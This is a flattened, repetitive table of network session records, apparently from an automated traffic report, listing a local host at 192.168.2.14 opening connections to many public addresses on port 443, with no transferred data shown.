                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17210192.168.2.1445820210.134.200.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17211192.168.2.1454206179.235.77.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17212192.168.2.1447196118.244.199.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17213192.168.2.143788474.124.154.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17214192.168.2.144970038.237.190.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17215192.168.2.144196457.6.196.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17216192.168.2.145455246.24.92.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17217192.168.2.1442256120.185.77.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17218192.168.2.144024832.247.71.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17219192.168.2.1446750151.241.189.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17220192.168.2.144158086.146.41.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17221192.168.2.144055217.73.14.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17222192.168.2.144468097.54.162.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17223192.168.2.1446300167.194.184.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17224192.168.2.1458704120.59.198.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17225192.168.2.1444272186.99.215.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17226192.168.2.143292212.163.40.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17227192.168.2.143563890.123.77.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17228192.168.2.1457194110.154.149.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17229192.168.2.1440084133.41.114.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17230192.168.2.1449990195.124.196.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17231192.168.2.143346683.161.93.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17232192.168.2.145954642.237.75.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17233192.168.2.1436788139.81.20.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17234192.168.2.1458522113.57.37.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17235192.168.2.145458284.157.36.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17236192.168.2.1457384212.96.112.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17237192.168.2.145567283.19.121.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17238192.168.2.1451736177.168.192.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17239192.168.2.144612670.126.139.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17240192.168.2.144426054.126.1.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17241192.168.2.1440290203.137.160.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17242192.168.2.144895049.213.69.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17243192.168.2.1460034190.179.124.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17244192.168.2.1460802108.63.11.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17245192.168.2.1455314197.39.114.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17246192.168.2.1444452202.1.121.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17247192.168.2.143612685.60.75.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17248192.168.2.146066023.239.50.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17249192.168.2.145021296.125.206.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17250192.168.2.143493290.48.6.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17251192.168.2.1457656223.244.183.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17252192.168.2.1458036193.25.57.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17253192.168.2.144287869.5.160.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17254192.168.2.1459118141.151.121.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17255192.168.2.1441660142.192.68.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17256192.168.2.1456982145.103.64.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17257192.168.2.1449422198.147.7.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17258192.168.2.1444338189.73.230.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17259192.168.2.144237420.183.253.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17260192.168.2.1437402217.61.175.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17261192.168.2.1447164124.228.129.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17262192.168.2.145823471.150.76.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17263192.168.2.1436658165.255.245.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17264192.168.2.1445450129.156.128.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17265192.168.2.144127480.128.28.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17266192.168.2.1436418202.251.177.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17267192.168.2.145844873.165.13.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17268192.168.2.1435084207.208.17.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17269192.168.2.144391431.213.57.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17270192.168.2.145140046.57.218.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17271192.168.2.1448704155.11.161.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17272192.168.2.1459180156.103.164.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17273192.168.2.1442358121.85.46.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17274192.168.2.1451486216.254.96.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17275192.168.2.1435162118.133.70.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17276192.168.2.14487248.214.241.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17277192.168.2.1452702184.255.199.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17278192.168.2.144039092.154.247.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17279192.168.2.1438324208.120.141.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17280192.168.2.145539668.144.91.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17281192.168.2.144000053.102.51.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17282192.168.2.1456394194.101.140.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17283192.168.2.143488039.233.50.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17284192.168.2.143684882.92.26.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17285192.168.2.145716284.63.176.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17286192.168.2.143958419.1.9.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17287192.168.2.145638818.99.72.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17288192.168.2.1439836165.73.202.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17289192.168.2.1457082115.227.124.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17290192.168.2.1447078119.228.231.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17291192.168.2.145647267.196.188.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17292192.168.2.1441244146.63.101.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17293192.168.2.1444344194.223.128.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17294192.168.2.144343225.15.34.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17295192.168.2.1444854105.229.35.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17296192.168.2.1460052174.127.100.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17297192.168.2.1446026202.179.149.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17298192.168.2.1434306198.152.82.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17299192.168.2.1438618165.131.35.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17300192.168.2.1460566160.86.217.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17301192.168.2.1452376188.53.89.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17302192.168.2.143370677.128.240.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17303192.168.2.14461844.89.63.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17304192.168.2.1440670109.12.200.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17305192.168.2.146045232.248.105.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17306192.168.2.145007083.84.146.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17307192.168.2.144011468.28.212.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17308192.168.2.1456178180.159.68.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17309192.168.2.1458934141.136.237.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17310192.168.2.1433436207.0.97.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17311192.168.2.1433388132.169.30.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17312192.168.2.1452044219.135.145.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17313192.168.2.1450048120.26.29.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17314192.168.2.1447312164.52.131.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17315192.168.2.144452862.128.40.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17316192.168.2.143751671.94.16.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17317192.168.2.1441260146.126.58.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17318192.168.2.1438536131.102.243.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17319192.168.2.1458592116.1.190.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17320192.168.2.14500508.210.56.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17321192.168.2.1443664128.82.13.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17322192.168.2.1460426148.37.177.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17323192.168.2.143648446.205.19.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17324192.168.2.1444744163.78.202.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17325192.168.2.143818640.231.239.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17326192.168.2.144279420.203.203.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17327192.168.2.145377836.192.188.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17328192.168.2.1453966107.210.183.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17329192.168.2.1450800123.157.87.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17330192.168.2.144491474.133.201.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17331192.168.2.143998046.184.86.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17332192.168.2.1443752131.59.27.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17333192.168.2.143726454.143.43.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17334192.168.2.145380686.244.104.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17335192.168.2.1437954204.224.204.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17336192.168.2.1444520117.29.138.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17337192.168.2.1436198166.36.63.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17338192.168.2.1448788115.61.148.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17339192.168.2.1435842126.123.91.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17340192.168.2.146088039.189.202.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17341192.168.2.1453172141.82.240.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17342192.168.2.143542877.25.77.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17343192.168.2.1456574205.208.103.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17344192.168.2.144116894.195.134.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17345192.168.2.145296257.193.136.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17346192.168.2.14411269.162.179.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17347192.168.2.1447528222.128.56.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17348192.168.2.145051889.151.129.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17349192.168.2.145565254.236.190.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17350192.168.2.1459788132.57.155.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17351192.168.2.145919242.222.40.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17352192.168.2.1451478195.185.229.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17353192.168.2.1444390131.242.101.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17354192.168.2.1432784107.36.134.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17355192.168.2.14546548.143.43.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17356192.168.2.144633280.174.145.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17357192.168.2.1439640212.118.112.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17358192.168.2.143770867.27.176.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17359192.168.2.1444014167.255.86.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17360192.168.2.1449820115.204.4.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17361192.168.2.144149444.187.45.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17362192.168.2.144518476.234.19.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17363192.168.2.145465696.4.62.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17364192.168.2.143423273.113.169.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17365192.168.2.1443536134.212.235.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17366192.168.2.1435122105.138.139.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17367192.168.2.1433510113.202.68.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17368192.168.2.1433152156.88.110.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17369192.168.2.1448308145.66.249.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17370192.168.2.1449930202.99.215.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17371192.168.2.1441398196.218.15.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17372192.168.2.1453074137.193.13.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17373192.168.2.1447826205.122.28.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17374192.168.2.143939632.144.124.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17375192.168.2.1454500162.83.218.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17376192.168.2.1435194206.226.109.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17377192.168.2.145975451.58.58.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17378192.168.2.1454618189.194.84.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17379192.168.2.143668896.52.149.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17380192.168.2.143920824.50.200.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17381192.168.2.1439588154.245.30.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17382192.168.2.1455348153.179.223.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17383192.168.2.1454410193.32.151.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17384192.168.2.1455914201.250.31.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17385192.168.2.1450762203.46.14.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17386192.168.2.1454322157.64.122.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17387192.168.2.144079683.115.143.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17388192.168.2.144836412.130.104.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17389192.168.2.1450612170.230.41.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17390192.168.2.1449010182.4.210.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17391192.168.2.1457686147.33.226.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17392192.168.2.1447980144.34.213.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17393192.168.2.1445038166.140.146.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17394192.168.2.1449596171.182.32.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17395192.168.2.1447828174.44.216.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17396192.168.2.1451326170.209.29.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17397192.168.2.1453914100.236.27.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17398192.168.2.1434826193.141.108.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17399192.168.2.1450342111.207.102.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17400192.168.2.144959462.147.53.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17401192.168.2.145474624.22.215.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17402192.168.2.144853613.112.205.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17403192.168.2.145444098.166.54.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17404192.168.2.1435732164.16.80.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17405192.168.2.1435898213.58.135.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17406192.168.2.143764674.150.241.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17407192.168.2.144311666.150.229.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17408192.168.2.1446038222.192.229.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17409192.168.2.1444156120.189.249.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17410192.168.2.1447962174.105.106.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17411192.168.2.144047283.50.90.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17412192.168.2.145044271.232.238.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17413192.168.2.144593687.208.4.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17414192.168.2.1436202130.114.208.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17415192.168.2.1436244212.3.54.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17416192.168.2.1444386170.180.215.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17417192.168.2.144486425.176.216.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17418192.168.2.1439260221.164.117.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17419192.168.2.1439458150.52.21.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17420192.168.2.1457042114.48.237.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17421192.168.2.1437418222.113.241.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17422192.168.2.1447844169.57.192.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17423192.168.2.1438668115.143.90.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17424192.168.2.143687876.179.63.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17425192.168.2.1456426116.172.9.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17426192.168.2.1459224146.162.49.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17427192.168.2.1448868146.11.57.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17428192.168.2.145027469.6.23.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17429192.168.2.144794084.9.166.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17430192.168.2.1455494203.241.98.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
